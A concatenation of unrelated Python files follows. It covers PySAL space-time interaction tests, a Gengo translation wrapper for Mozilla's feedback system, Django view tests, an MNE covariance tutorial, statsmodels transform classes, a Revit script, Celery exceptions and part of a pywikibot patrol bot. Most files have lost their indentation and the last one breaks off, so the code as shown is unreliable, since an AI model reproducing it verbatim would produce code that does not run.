following example runs the standardized Mantel test without a constant
or transformation; however, as recommended by Mantel (1967) [2]_, these
should be added by the user. This can be done by adjusting the constant
and power parameters.
>>> result = mantel(events, 99, scon=1.0, spow=-1.0, tcon=1.0, tpow=-1.0)
Next, we examine the result of the test.
>>> print("%6.6f"%result['stat'])
0.048368
Finally, we look at the pseudo-significance of this value, calculated by
permuting the timestamps and rerunning the statistic for each of the 99
permutations. According to these parameters, the results indicate
space-time interaction between the events.
>>> print("%2.2f"%result['pvalue'])
0.01
"""
n = events.n
s = events.space
t = events.t
# calculate the spatial and temporal distance matrices for the events
distmat = cg.distance_matrix(s)
timemat = cg.distance_matrix(t)
# calculate the transformed standardized statistic
timevec = (util.get_lower(timemat) + tcon) ** tpow
distvec = (util.get_lower(distmat) + scon) ** spow
stat = stats.pearsonr(timevec, distvec)[0].sum()
# return the results (if no inference)
if permutations == 0:
return stat
# loop for generating a random distribution to assess significance
dist = []
for i in range(permutations):
trand = util.shuffle_matrix(timemat, range(n))
timevec = (util.get_lower(trand) + tcon) ** tpow
m = stats.pearsonr(timevec, distvec)[0].sum()
dist.append(m)
## establish the pseudo significance of the observed statistic
distribution = np.array(dist)
greater = np.ma.masked_greater_equal(distribution, stat)
count = np.ma.count_masked(greater)
pvalue = (count + 1.0) / (permutations + 1.0)
# report the results
mantel_result = {'stat': stat, 'pvalue': pvalue}
return mantel_result
def jacquez(events, k, permutations=99):
"""
Jacquez k nearest neighbors test for spatio-temporal interaction. [3]_
Parameters
----------
events : space time events object
an output instance from the class SpaceTimeEvents
k : int
the number of nearest neighbors to be searched
permutations : int
the number of permutations used to establish pseudo-
significance (default is 99)
Returns
-------
jacquez_result : dictionary
contains the statistic (stat) for the test and the
associated p-value (pvalue)
stat : float
value of the Jacquez k nearest neighbors test for the
dataset
pvalue : float
p-value associated with the statistic (normally
distributed with k-1 df)
References
----------
.. [3] G. Jacquez. 1996. A k nearest neighbour test for space-time
interaction. Statistics in Medicine, 15(18):1935-1949.
Examples
--------
>>> import numpy as np
>>> import pysal
Read in the example data and create an instance of SpaceTimeEvents.
>>> path = pysal.examples.get_path("burkitt")
>>> events = SpaceTimeEvents(path,'T')
The Jacquez test counts the number of events that are k nearest
neighbors in both time and space. The following runs the Jacquez test
on the example data and reports the resulting statistic. In this case,
there are 13 instances where events are nearest neighbors in both space
and time.
>>> np.random.seed(100)
>>> result = jacquez(events,k=3,permutations=99)
    >>> print(result['stat'])
13
The significance of this can be assessed by calling the p-
value from the results dictionary, as shown below. Again, no
space-time interaction is observed.
>>> print("%2.2f"%result['pvalue'])
0.21
"""
n = events.n
time = events.time
space = events.space
# calculate the nearest neighbors in space and time separately
knnt = Distance.knnW(time, k)
knns = Distance.knnW(space, k)
nnt = knnt.neighbors
nns = knns.neighbors
knn_sum = 0
# determine which events are nearest neighbors in both space and time
for i in range(n):
t_neighbors = nnt[i]
s_neighbors = nns[i]
check = set(t_neighbors)
inter = check.intersection(s_neighbors)
count = len(inter)
knn_sum += count
stat = knn_sum
# return the results (if no inference)
if permutations == 0:
return stat
# loop for generating a random distribution to assess significance
dist = []
for p in range(permutations):
j = 0
trand = np.random.permutation(time)
knnt = Distance.knnW(trand, k)
nnt = knnt.neighbors
for i in range(n):
t_neighbors = nnt[i]
s_neighbors = nns[i]
check = set(t_neighbors)
inter = check.intersection(s_neighbors)
count = len(inter)
j += count
dist.append(j)
# establish the pseudo significance of the observed statistic
distribution = np.array(dist)
greater = np.ma.masked_greater_equal(distribution, stat)
count = np.ma.count_masked(greater)
pvalue = (count + 1.0) / (permutations + 1.0)
# report the results
jacquez_result = {'stat': stat, 'pvalue': pvalue}
return jacquez_result
def modified_knox(events, delta, tau, permutations=99):
"""
Baker's modified Knox test for spatio-temporal interaction. [1]_
Parameters
----------
events : space time events object
an output instance from the class SpaceTimeEvents
delta : float
threshold for proximity in space
tau : float
threshold for proximity in time
permutations : int
the number of permutations used to establish pseudo-
significance (default is 99)
Returns
-------
modknox_result : dictionary
contains the statistic (stat) for the test and the
associated p-value (pvalue)
stat : float
value of the modified knox test for the dataset
pvalue : float
pseudo p-value associated with the statistic
References
----------
.. [1] R.D. Baker. Identifying space-time disease clusters. Acta Tropica,
91(3):291-299, 2004
Examples
--------
>>> import numpy as np
>>> import pysal
Read in the example data and create an instance of SpaceTimeEvents.
>>> path = pysal.examples.get_path("burkitt")
>>> events = SpaceTimeEvents(path,'T')
Set the random seed generator. This is used by the permutation based
inference to replicate the pseudo-significance of our example results -
the end-user will normally omit this step.
>>> np.random.seed(100)
Run the modified Knox test with distance and time thresholds of 20 and 5,
respectively. This counts the events that are closer than 20 units in
space, and 5 units in time.
>>> result = modified_knox(events,delta=20,tau=5,permutations=99)
Next, we examine the results. First, we call the statistic from the
results dictionary. This reports the difference between the observed
and expected Knox statistic.
>>> print("%2.8f"%result['stat'])
2.81016043
Next, we look at the pseudo-significance of this value, calculated by
permuting the timestamps and rerunning the statistics. In this case,
the results indicate there is likely no space-time interaction.
>>> print("%2.2f"%result['pvalue'])
0.11
"""
n = events.n
s = events.space
t = events.t
# calculate the spatial and temporal distance matrices for the events
sdistmat = cg.distance_matrix(s)
tdistmat = cg.distance_matrix(t)
# identify events within thresholds
spacmat = np.ones((n, n))
spacbin = sdistmat <= delta
spacmat = spacmat * spacbin
timemat = np.ones((n, n))
timebin = tdistmat <= tau
timemat = timemat * timebin
# calculate the observed (original) statistic
knoxmat = timemat * spacmat
obsstat = (knoxmat.sum() - n)
    # calculate the expected value
ssumvec = np.reshape((spacbin.sum(axis=0) - 1), (n, 1))
tsumvec = np.reshape((timebin.sum(axis=0) - 1), (n, 1))
expstat = (ssumvec * tsumvec).sum()
# calculate the modified stat
stat = (obsstat - (expstat / (n - 1.0))) / 2.0
# return results (if no inference)
if permutations == 0:
return stat
distribution = []
# loop for generating a random distribution to assess significance
for p in range(permutations):
rtdistmat = util.shuffle_matrix(tdistmat, range(n))
timemat = np.ones((n, n))
timebin = rtdistmat <= tau
timemat = timemat * timebin
# calculate the observed knox again
knoxmat = timemat * spacmat
obsstat = (knoxmat.sum() - n)
        # calculate the expected value again
ssumvec = np.reshape((spacbin.sum(axis=0) - 1), (n, 1))
tsumvec = np.reshape((timebin.sum(axis=0) - 1), (n, 1))
expstat = (ssumvec * tsumvec).sum()
# calculate the modified stat
tempstat = (obsstat - (expstat / (n - 1.0))) / 2.0
distribution.append(tempstat)
# establish the pseudo significance of the observed statistic
distribution = np.array(distribution)
greater = np.ma.masked_greater_equal(distribution, stat)
count = np.ma.count_masked(greater)
pvalue = (count + 1.0) / (permutations + 1.0)
# return results
modknox_result = {'stat': stat, 'pvalue': pvalue}
return modknox_result
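# A self-contained sketch (not part of pysal) of the permutation logic shared
# by the tests above, run on synthetic data: count event pairs close in both
# space and time, then compare that count against counts obtained after
# shuffling the timestamps.
if __name__ == '__main__':
    np.random.seed(100)
    num = 50
    xy = np.random.random((num, 2)) * 100  # synthetic coordinates
    tt = np.random.random((num, 1)) * 365  # synthetic timestamps
    sclose = cg.distance_matrix(xy) <= 20
    tclose = cg.distance_matrix(tt) <= 5
    observed = (np.logical_and(sclose, tclose).sum() - num) / 2.0
    draws = []
    for _ in range(99):
        rclose = cg.distance_matrix(np.random.permutation(tt)) <= 5
        draws.append((np.logical_and(sclose, rclose).sum() - num) / 2.0)
    pvalue = (sum(d >= observed for d in draws) + 1.0) / (99 + 1.0)
    print(observed, pvalue)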
|
from functools import wraps
from django.conf import settings
import json
import requests
from gengo import Gengo, GengoError # noqa
GENGO_LANGUAGE_CACHE = None
GENGO_LANGUAGE_PAIRS_CACHE = None
GENGO_UNSUPPORTED_MACHINE_LC_SRC = [
'ar',
'cs',
'da',
'el',
'fi',
'hu',
'id',
'ms',
'no',
'ro',
'sk',
'sv',
'th',
'tr',
'uk',
'vi',
]
GENGO_COMMENT = """\
This is a response from the Mozilla Input feedback system. It was
submitted by an anonymous user in a non-English language. The feedback
is used in aggregate to determine general user sentiment about Mozilla
products and its features.
This translation job was created by an automated system, so we're
unable to respond to translator comments.
If the response is nonsensical or junk text, then write "spam".
"""
GENGO_DETECT_LANGUAGE_API = 'https://api.gengo.com/service/detect_language'
class FjordGengoError(Exception):
"""Superclass for all Gengo translation errors"""
pass
class GengoConfigurationError(FjordGengoError):
"""Raised when the Gengo-centric keys aren't set in settings"""
class GengoUnknownLanguage(FjordGengoError):
"""Raised when the guesser can't guess the language"""
class GengoUnsupportedLanguage(FjordGengoError):
"""Raised when the guesser guesses a language Gengo doesn't support
.. Note::
If you buy me a beer, I'll happily tell you how I feel about
this.
"""
class GengoAPIFailure(FjordGengoError):
"""Raised when the api kicks up an error"""
class GengoMachineTranslationFailure(FjordGengoError):
"""Raised when machine translation didn't work"""
class GengoHumanTranslationFailure(FjordGengoError):
"""Raised when human translation didn't work"""
def requires_keys(fun):
"""Throw GengoConfigurationError if keys aren't set"""
@wraps(fun)
def _requires_keys(self, *args, **kwargs):
if not self.gengo_api:
raise GengoConfigurationError()
return fun(self, *args, **kwargs)
return _requires_keys
class FjordGengo(object):
def __init__(self):
"""Constructs a FjordGengo wrapper around the Gengo class
We do this to make using the API a little easier in the
context for Fjord as it includes the business logic around
specific use cases we have.
Also, having all the Gengo API stuff in one place makes it
easier for mocking when testing.
"""
if settings.GENGO_PUBLIC_KEY and settings.GENGO_PRIVATE_KEY:
gengo_api = Gengo(
public_key=settings.GENGO_PUBLIC_KEY,
private_key=settings.GENGO_PRIVATE_KEY,
sandbox=getattr(settings, 'GENGO_USE_SANDBOX', True)
)
else:
gengo_api = None
self.gengo_api = gengo_api
def is_configured(self):
"""Returns whether Gengo is configured for Gengo API requests"""
        return self.gengo_api is not None
@requires_keys
def get_balance(self):
"""Returns the account balance as a float"""
balance = self.gengo_api.getAccountBalance()
return float(balance['response']['credits'])
@requires_keys
def get_languages(self, raw=False):
"""Returns the list of supported language targets
:arg raw: True if you want the whole response, False if you
want just the list of languages
.. Note::
This is cached until the next deployment.
"""
global GENGO_LANGUAGE_CACHE
if not GENGO_LANGUAGE_CACHE:
resp = self.gengo_api.getServiceLanguages()
GENGO_LANGUAGE_CACHE = (
resp,
tuple([item['lc'] for item in resp['response']])
)
if raw:
return GENGO_LANGUAGE_CACHE[0]
else:
return GENGO_LANGUAGE_CACHE[1]
@requires_keys
def get_language_pairs(self):
"""Returns the list of supported language pairs for human translation
.. Note::
This is cached until the next deployment.
"""
global GENGO_LANGUAGE_PAIRS_CACHE
if not GENGO_LANGUAGE_PAIRS_CACHE:
resp = self.gengo_api.getServiceLanguagePairs()
# NB: This looks specifically at the standard tier because
# that's what we're using. It ignores the other tiers.
pairs = [(item['lc_src'], item['lc_tgt'])
for item in resp['response']
if item['tier'] == u'standard']
GENGO_LANGUAGE_PAIRS_CACHE = pairs
return GENGO_LANGUAGE_PAIRS_CACHE
@requires_keys
def get_job(self, job_id):
"""Returns data for a specified job
:arg job_id: the job_id for the job we want data for
:returns: dict of job data
"""
resp = self.gengo_api.getTranslationJob(id=str(job_id))
if resp['opstat'] != 'ok':
raise GengoAPIFailure(
'opstat: {0}, response: {1}'.format(resp['opstat'], resp))
return resp['response']['job']
def guess_language(self, text):
"""Guesses the language of the text
:arg text: text to guess the language of
:raises GengoUnknownLanguage: if the request wasn't successful
or the guesser can't figure out which language the text is
"""
# get_language is a "private API" thing Gengo has, so it's not
# included in the gengo library and we have to do it manually.
resp = requests.post(
GENGO_DETECT_LANGUAGE_API,
data=json.dumps({'text': text.encode('utf-8')}),
headers={
'Content-Type': 'application/json',
'Accept': 'application/json'
})
try:
resp_json = resp.json()
except ValueError:
# If it's not JSON, then I don't really know what it is,
# so I want to see it in an error email. Chances are it's
# some ephemeral problem.
#
# FIXME: Figure out a better thing to do here.
raise GengoAPIFailure(
u'ValueError: non-json response: {0} {1}'.format(
resp.status_code, resp.text))
if 'detected_lang_code' in resp_json:
lang = resp_json['detected_lang_code']
if lang == 'un':
raise GengoUnknownLanguage('unknown language')
return lang
raise GengoUnknownLanguage('request failure: {0}'.format(resp.content))
@requires_keys
def translate_bulk(self, jobs):
"""Performs translation through Gengo on multiple jobs
Translation is asynchronous--this method posts the translation
jobs and then returns the order information for those jobs
to be polled at a later time.
:arg jobs: a list of dicts with ``id``, ``lc_src``, ``lc_dst``
``tier``, ``text`` and (optional) ``unique_id`` keys
Response dict includes:
* job_count: number of jobs processed
* order_id: the order id
* group_id: I have no idea what this is
* credits_used: the number of credits used
* currency: the currency the credits are in
"""
payload = {}
for job in jobs:
payload['job_{0}'.format(job['id'])] = {
'body_src': job['text'],
'lc_src': job['lc_src'],
'lc_tgt': job['lc_dst'],
'tier': job['tier'],
'type': 'text',
'slug': 'Mozilla Input feedback response',
'force': 1,
'comment': GENGO_COMMENT,
'purpose': 'Online content',
'tone': 'informal',
'use_preferred': 0,
'auto_approve': 1,
'custom_data': job.get('unique_id', job['id'])
}
resp = self.gengo_api.postTranslationJobs(jobs=payload)
if resp['opstat'] != 'ok':
raise GengoAPIFailure(
'opstat: {0}, response: {1}'.format(resp['opstat'], resp))
return resp['response']
@requires_keys
def completed_jobs_for_order(self, order_id):
"""Returns jobs for an order which are completed
Gengo uses the status "approved" for jobs that have been
translated and approved and are completed.
:arg order_id: the order_id for the jobs we want to look at
:returns: list of job data dicts; interesting fields being
``custom_data`` and ``body_tgt``
"""
resp = self.gengo_api.getTranslationOrderJobs(id=str(order_id))
if resp['opstat'] != 'ok':
raise GengoAPIFailure(
'opstat: {0}, response: {1}'.format(resp['opstat'], resp))
job_ids = resp['response']['order']['jobs_approved']
if not job_ids:
return []
job_ids = ','.join(job_ids)
resp = self.gengo_api.getTranslationJobBatch(id=job_ids)
if resp['opstat'] != 'ok':
raise GengoAPIFailure(
'opstat: {0}, response: {1}'.format(resp['opstat'], resp))
return resp['response']['jobs']
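# A hedged usage sketch (not part of the original module); it assumes Django
# settings with the Gengo keys are configured. The job id and text are made
# up; the dict keys follow the translate_bulk() docstring and the 'standard'
# tier used by get_language_pairs().
if __name__ == '__main__':
    gengo = FjordGengo()
    if gengo.is_configured():
        jobs = [{'id': 42, 'lc_src': 'es', 'lc_dst': 'en',
                 'tier': 'standard', 'text': u'Hola, mundo'}]
        order = gengo.translate_bulk(jobs)
        print(order['order_id'], order['credits_used'])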
|
import json
import django
from django.conf import settings
from django.contrib.sites.models import Site
from django.http import HttpResponseRedirect, HttpResponsePermanentRedirect
from django.test.client import RequestFactory
import mock
from nose.tools import eq_
from pyquery import PyQuery as pq
from kitsune.sumo.templatetags.jinja_helpers import urlparams
from kitsune.sumo.middleware import LocaleURLMiddleware
from kitsune.sumo.tests import TestCase
from kitsune.sumo.urlresolvers import reverse
from kitsune.sumo.views import deprecated_redirect, redirect_to
class RedirectTests(TestCase):
rf = RequestFactory()
def test_redirect_to(self):
resp = redirect_to(self.rf.get('/'), url='home', permanent=False)
assert isinstance(resp, HttpResponseRedirect)
eq_(reverse('home'), resp['location'])
def test_redirect_permanent(self):
resp = redirect_to(self.rf.get('/'), url='home')
assert isinstance(resp, HttpResponsePermanentRedirect)
eq_(reverse('home'), resp['location'])
def test_redirect_kwargs(self):
resp = redirect_to(self.rf.get('/'), url='users.confirm_email',
activation_key='1234')
eq_(reverse('users.confirm_email', args=['1234']),
resp['location'])
@mock.patch.object(Site.objects, 'get_current')
def test_deprecated_redirect(self, get_current):
get_current.return_value.domain = 'su.mo.com'
req = self.rf.get('/en-US/')
# Since we're rendering a template we need this to run.
LocaleURLMiddleware().process_request(req)
resp = deprecated_redirect(req, url='home')
eq_(200, resp.status_code)
doc = pq(resp.content)
assert doc('meta[http-equiv=refresh]')
refresh = doc('meta[http-equiv=refresh]')
timeout, url = refresh.attr('content').split(';url=')
eq_('10', timeout)
eq_(reverse('home'), url)
class RobotsTestCase(TestCase):
# Use the hard-coded URL because it's well-known.
old_setting = settings.ENGAGE_ROBOTS
def tearDown(self):
settings.ENGAGE_ROBOTS = self.old_setting
def test_disengaged(self):
settings.ENGAGE_ROBOTS = False
response = self.client.get('/robots.txt')
eq_('User-Agent: *\nDisallow: /', response.content)
eq_('text/plain', response['content-type'])
def test_engaged(self):
settings.ENGAGE_ROBOTS = True
response = self.client.get('/robots.txt')
eq_('text/plain', response['content-type'])
assert len(response.content) > len('User-agent: *\nDisallow: /')
class VersionCheckTests(TestCase):
url = reverse('sumo.version')
def _is_forbidden(self, url):
res = self.client.get(url)
eq_(403, res.status_code)
eq_('', res.content)
@mock.patch.object(settings._wrapped, 'VERSION_CHECK_TOKEN', None)
def token_is_none(self):
self._is_forbidden(self.url)
self._is_forbidden(urlparams(self.url, token='foo'))
@mock.patch.object(settings._wrapped, 'VERSION_CHECK_TOKEN', 'foo')
def token_is_wrong(self):
self._is_forbidden(urlparams(self.url, token='bar'))
@mock.patch.object(settings._wrapped, 'VERSION_CHECK_TOKEN', 'foo')
def token_is_right(self):
res = self.client.get(urlparams(self.url, token='foo'))
eq_(200, res.status_code)
versions = json.loads(res.content)
eq_('.'.join(map(str, django.VERSION)), versions['django'])
class ForceErrorTests(TestCase):
url = reverse('sumo.error')
@mock.patch.object(settings._wrapped, 'STAGE', True)
def test_error(self):
"""On STAGE servers, be able to force an error."""
try:
self.client.get(self.url)
self.fail()
except NameError:
pass
@mock.patch.object(settings._wrapped, 'STAGE', False)
def test_hidden(self):
"""On a non-STAGE server, no forcing errors."""
res = self.client.get(self.url)
eq_(404, res.status_code)
|
"""
.. _tut_compute_covariance:
Computing covariance matrix
===========================
"""
import os.path as op
import mne
from mne.datasets import sample
data_path = sample.data_path()
raw_empty_room_fname = op.join(
data_path, 'MEG', 'sample', 'ernoise_raw.fif')
raw_empty_room = mne.io.read_raw_fif(raw_empty_room_fname)
raw_fname = op.join(data_path, 'MEG', 'sample', 'sample_audvis_raw.fif')
raw = mne.io.read_raw_fif(raw_fname)
raw.info['bads'] += ['EEG 053'] # bads + 1 more
noise_cov = mne.compute_raw_covariance(raw_empty_room, tmin=0, tmax=None)
events = mne.find_events(raw)
epochs = mne.Epochs(raw, events, event_id=1, tmin=-0.2, tmax=0.0,
baseline=(-0.2, 0.0))
noise_cov_baseline = mne.compute_covariance(epochs)
noise_cov.plot(raw_empty_room.info, proj=True)
noise_cov_baseline.plot(epochs.info)
cov = mne.compute_covariance(epochs, tmax=0., method='auto')
evoked = epochs.average()
evoked.plot_white(cov)
covs = mne.compute_covariance(epochs, tmax=0., method=('empirical', 'shrunk'),
return_estimators=True)
evoked = epochs.average()
evoked.plot_white(covs)
|
"""Nonlinear Transformation classes
Created on Sat Apr 16 16:06:11 2011
Author: Josef Perktold
License : BSD
"""
import numpy as np
class TransformFunction(object):
    def __call__(self, x):
        return self.func(x)
class SquareFunc(TransformFunction):
'''class to hold quadratic function with inverse function and derivative
using instance methods instead of class methods, if we want extension
to parameterized function
'''
def func(self, x):
return np.power(x, 2.)
def inverseplus(self, x):
return np.sqrt(x)
def inverseminus(self, x):
return 0.0 - np.sqrt(x)
def derivplus(self, x):
return 0.5/np.sqrt(x)
def derivminus(self, x):
return 0.0 - 0.5/np.sqrt(x)
class NegSquareFunc(TransformFunction):
'''negative quadratic function
'''
def func(self, x):
return -np.power(x,2)
def inverseplus(self, x):
return np.sqrt(-x)
def inverseminus(self, x):
return 0.0 - np.sqrt(-x)
def derivplus(self, x):
return 0.0 - 0.5/np.sqrt(-x)
def derivminus(self, x):
return 0.5/np.sqrt(-x)
class AbsFunc(TransformFunction):
'''class for absolute value transformation
'''
def func(self, x):
return np.abs(x)
def inverseplus(self, x):
return x
def inverseminus(self, x):
return 0.0 - x
def derivplus(self, x):
return 1.0
def derivminus(self, x):
return 0.0 - 1.0
class LogFunc(TransformFunction):
def func(self, x):
return np.log(x)
def inverse(self, y):
return np.exp(y)
def deriv(self, x):
return 1./x
class ExpFunc(TransformFunction):
def func(self, x):
return np.exp(x)
def inverse(self, y):
return np.log(y)
def deriv(self, x):
return np.exp(x)
class BoxCoxNonzeroFunc(TransformFunction):
def __init__(self, lamda):
self.lamda = lamda
def func(self, x):
return (np.power(x, self.lamda) - 1)/self.lamda
    def inverse(self, y):
        # invert func: y = (x**lamda - 1)/lamda  =>  x = (lamda*y + 1)**(1/lamda)
        return np.power(self.lamda * y + 1, 1. / self.lamda)
def deriv(self, x):
return np.power(x, self.lamda - 1)
class AffineFunc(TransformFunction):
def __init__(self, constant, slope):
self.constant = constant
self.slope = slope
def func(self, x):
return self.constant + self.slope * x
def inverse(self, y):
return (y - self.constant) / self.slope
def deriv(self, x):
return self.slope
class ChainFunc(TransformFunction):
def __init__(self, finn, fout):
self.finn = finn
self.fout = fout
def func(self, x):
return self.fout.func(self.finn.func(x))
    def inverse(self, y):
        return self.finn.inverse(self.fout.inverse(y))
def deriv(self, x):
z = self.finn.func(x)
return self.fout.deriv(z) * self.finn.deriv(x)
if __name__ == '__main__':
absf = AbsFunc()
    assert absf.func(5) == 5
    assert absf.func(-5) == 5
    assert absf.inverseplus(5) == 5
    assert absf.inverseminus(5) == -5
chainf = ChainFunc(AffineFunc(1,2), BoxCoxNonzeroFunc(2))
    print(chainf.func(3.))
    chainf2 = ChainFunc(BoxCoxNonzeroFunc(2), AffineFunc(1, 2))
    print(chainf2.func(3.))
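    # Additional sketch: spot-check that inverse() undoes func() for the
    # smooth transforms (arguments chosen inside each function's domain).
    logf = LogFunc()
    assert np.allclose(logf.inverse(logf.func(3.0)), 3.0)
    aff = AffineFunc(1, 2)
    assert np.allclose(aff.inverse(aff.func(3.0)), 3.0)
    bc = BoxCoxNonzeroFunc(2)
    assert np.allclose(bc.inverse(bc.func(3.0)), 3.0)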
|
import clr
from System.Collections.Generic import *
clr.AddReference('RevitAPI')
from Autodesk.Revit.DB import *
import Autodesk
clr.AddReference("RevitNodes")
import Revit
clr.ImportExtensions(Revit.Elements)
clr.AddReference("RevitServices")
import RevitServices
from RevitServices.Persistence import DocumentManager
from RevitServices.Transactions import TransactionManager
doc = DocumentManager.Instance.CurrentDBDocument
items = UnwrapElement(IN[0])
source_view = UnwrapElement(IN[1])
target_view = UnwrapElement(IN[2])
ids = list()
for item in items:
ids.append(item.Id)
itemlist = List[ElementId](ids)
TransactionManager.Instance.EnsureInTransaction(doc)
newitems = ElementTransformUtils.CopyElements(source_view, itemlist, target_view, None, None)
TransactionManager.Instance.TransactionTaskDone()
elementlist = list()
for item in newitems:
elementlist.append(doc.GetElement(item).ToDSType(False))
OUT = elementlist
|
"""
celery.exceptions
~~~~~~~~~~~~~~~~~
This module contains all exceptions used by the Celery API.
"""
from __future__ import absolute_import
import numbers
from .five import string_t
from billiard.exceptions import ( # noqa
SoftTimeLimitExceeded, TimeLimitExceeded, WorkerLostError, Terminated,
)
__all__ = ['SecurityError', 'Ignore', 'QueueNotFound',
'WorkerShutdown', 'WorkerTerminate',
'ImproperlyConfigured', 'NotRegistered', 'AlreadyRegistered',
'TimeoutError', 'MaxRetriesExceededError', 'Retry',
'TaskRevokedError', 'NotConfigured', 'AlwaysEagerIgnored',
'InvalidTaskError', 'ChordError', 'CPendingDeprecationWarning',
'CDeprecationWarning', 'FixupWarning', 'DuplicateNodenameWarning',
'SoftTimeLimitExceeded', 'TimeLimitExceeded', 'WorkerLostError',
'Terminated']
UNREGISTERED_FMT = """\
Task of kind {0} is not registered, please make sure it's imported.\
"""
class SecurityError(Exception):
"""Security related exceptions.
Handle with care.
"""
class Ignore(Exception):
"""A task can raise this to ignore doing state updates."""
class Reject(Exception):
"""A task can raise this if it wants to reject/requeue the message."""
def __init__(self, reason=None, requeue=False):
self.reason = reason
self.requeue = requeue
super(Reject, self).__init__(reason, requeue)
def __repr__(self):
return 'reject requeue=%s: %s' % (self.requeue, self.reason)
class WorkerTerminate(SystemExit):
"""Signals that the worker should terminate immediately."""
SystemTerminate = WorkerTerminate # XXX compat
class WorkerShutdown(SystemExit):
"""Signals that the worker should perform a warm shutdown."""
class QueueNotFound(KeyError):
"""Task routed to a queue not in CELERY_QUEUES."""
class ImproperlyConfigured(ImportError):
"""Celery is somehow improperly configured."""
class NotRegistered(KeyError):
"""The task is not registered."""
def __repr__(self):
return UNREGISTERED_FMT.format(self)
class AlreadyRegistered(Exception):
"""The task is already registered."""
class TimeoutError(Exception):
"""The operation timed out."""
class MaxRetriesExceededError(Exception):
"""The tasks max restart limit has been exceeded."""
class Retry(Exception):
"""The task is to be retried later."""
#: Optional message describing context of retry.
message = None
#: Exception (if any) that caused the retry to happen.
exc = None
#: Time of retry (ETA), either :class:`numbers.Real` or
#: :class:`~datetime.datetime`.
when = None
def __init__(self, message=None, exc=None, when=None, **kwargs):
from kombu.utils.encoding import safe_repr
self.message = message
if isinstance(exc, string_t):
self.exc, self.excs = None, exc
else:
self.exc, self.excs = exc, safe_repr(exc) if exc else None
self.when = when
Exception.__init__(self, exc, when, **kwargs)
def humanize(self):
if isinstance(self.when, numbers.Real):
return 'in {0.when}s'.format(self)
return 'at {0.when}'.format(self)
def __str__(self):
if self.message:
return self.message
if self.excs:
return 'Retry {0}: {1}'.format(self.humanize(), self.excs)
return 'Retry {0}'.format(self.humanize())
def __reduce__(self):
return self.__class__, (self.message, self.excs, self.when)
RetryTaskError = Retry # XXX compat
class TaskRevokedError(Exception):
"""The task has been revoked, so no result available."""
class NotConfigured(UserWarning):
"""Celery has not been configured, as no config module has been found."""
class AlwaysEagerIgnored(UserWarning):
"""send_task ignores CELERY_ALWAYS_EAGER option"""
class InvalidTaskError(Exception):
"""The task has invalid data or is not properly constructed."""
class IncompleteStream(Exception):
"""Found the end of a stream of data, but the data is not yet complete."""
class ChordError(Exception):
"""A task part of the chord raised an exception."""
class CPendingDeprecationWarning(PendingDeprecationWarning):
pass
class CDeprecationWarning(DeprecationWarning):
pass
class FixupWarning(UserWarning):
pass
class DuplicateNodenameWarning(UserWarning):
"""Multiple workers are using the same nodename."""
|
"""
This bot obtains a list of recent changes and new pages, and marks the
edits as patrolled if they are covered by a whitelist.
See http://en.wikisource.org/wiki/User:JVbot/patrol_whitelist
Commandline parameters that are supported:
-namespace Filter the page generator to only yield pages in
specified namespaces
-ask If True, confirm each patrol action
-whitelist page title for whitelist (optional)
-autopatroluserns Automatically patrol users' edits in their own user space
-versionchecktime Seconds to wait before rechecking the whitelist for a newer version
"""
from __future__ import unicode_literals
__version__ = '$Id$'
import pywikibot
from pywikibot import pagegenerators, Bot
import mwlib.uparser # used to parse the whitelist
import mwlib.parser # used to parse the whitelist
import time
_logger = 'patrol'
docuReplacements = {
'¶ms;': pagegenerators.parameterHelp
}
class PatrolBot(Bot):
"""Bot marks the edits as patrolled based on info obtained by whitelist."""
# Localised name of the whitelist page
whitelist_subpage_name = {
'en': u'patrol_whitelist',
}
def __init__(self, **kwargs):
"""
Constructor.
@kwarg feed - The changes feed to work on (Newpages
or Recentchanges)
@kwarg ask - If True, confirm each patrol action
@kwarg whitelist - page title for whitelist (optional)
        @kwarg autopatroluserns - Automatically patrol users' edits in their own user space
        @kwarg versionchecktime - Seconds to wait before rechecking the whitelist for a newer version
"""
self.availableOptions.update({
'ask': False,
'feed': None,
'whitelist': None,
'versionchecktime': 300,
'autopatroluserns': False
})
super(PatrolBot, self).__init__(**kwargs)
self.recent_gen = True
self.user = None
self.site = pywikibot.Site()
if self.getOption('whitelist'):
self.whitelist_pagename = self.getOption('whitelist')
else:
local_whitelist_subpage_name = pywikibot.translate(
self.site, self.whitelist_subpage_name, fallback=True)
self.whitelist_pagename = u'%s:%s/%s' % (
self.site.namespace(2),
self.site.username(),
local_whitelist_subpage_name)
self.whitelist = self.getOption('whitelist')
self.whitelist_ts = 0
self.whitelist_load_ts = 0
self.highest_rcid = 0 # used to track loops
self.last_rcid = 0
self.repeat_start_ts = 0
self.rc_item_counter = 0 # counts how many items have been reviewed
self.patrol_counter = 0 # and how many times an action was taken
def load_whitelist(self):
"""Load most recent watchlist_page for further processing."""
# Check for a more recent version after versionchecktime in sec.
if (self.whitelist_load_ts and (time.time() - self.whitelist_load_ts <
self.getOption('versionchecktime'))):
if pywikibot.config.verbose_output:
pywikibot.output(u'Whitelist not stale yet')
return
whitelist_page = pywikibot.Page(self.site,
self.whitelist_pagename)
if not self.whitelist:
pywikibot.output(u'Loading %s' % self.whitelist_pagename)
try:
if self.whitelist_ts:
# check for a more recent version
h = whitelist_page.revisions()
last_edit_ts = next(h).timestamp
if last_edit_ts == self.whitelist_ts:
# As there hasn't been any change to the whitelist
# it has been effectively reloaded 'now'
self.whitelist_load_ts = time.time()
if pywikibot.config.verbose_output:
pywikibot.output(u'Whitelist not modified')
return
if self.whitelist:
pywikibot.output(u'Reloading whitelist')
# Fetch whitelist
wikitext = whitelist_page.get()
# Parse whitelist
self.whitelist = self.parse_page_tuples(wikitext, self.user)
# Record timestamp
self.whitelist_ts = whitelist_page.editTime()
self.whitelist_load_ts = time.time()
except Exception as e:
            # cascade if there isn't a whitelist to fall back on
if not self.whitelist:
raise
pywikibot.error(u'%s' % e)
@staticmethod
def add_to_tuples(tuples, user, page):
"""Update tuples 'user' key by adding page."""
if pywikibot.config.verbose_output:
pywikibot.output(u"Adding %s:%s" % (user, page.title()))
if user in tuples:
tuples[user].append(page)
else:
tuples[user] = [page]
def in_list(self, pagelist, title):
"""Check if title present in pagelist."""
if pywikibot.config.verbose_output:
pywikibot.output(u'Checking whitelist for: %s' % title)
# quick check for exact match
if title in pagelist:
return title
# quick check for wildcard
if '' in pagelist:
if pywikibot.config.verbose_output:
pywikibot.output(u'wildcarded')
return '.*'
for item in pagelist:
if pywikibot.config.verbose_output:
pywikibot.output(u'checking against whitelist item = %s' % item)
if isinstance(item, PatrolRule):
if pywikibot.config.verbose_output:
pywikibot.output(u'invoking programmed rule')
if item.match(title):
return item
elif title_match(item, title):
return item
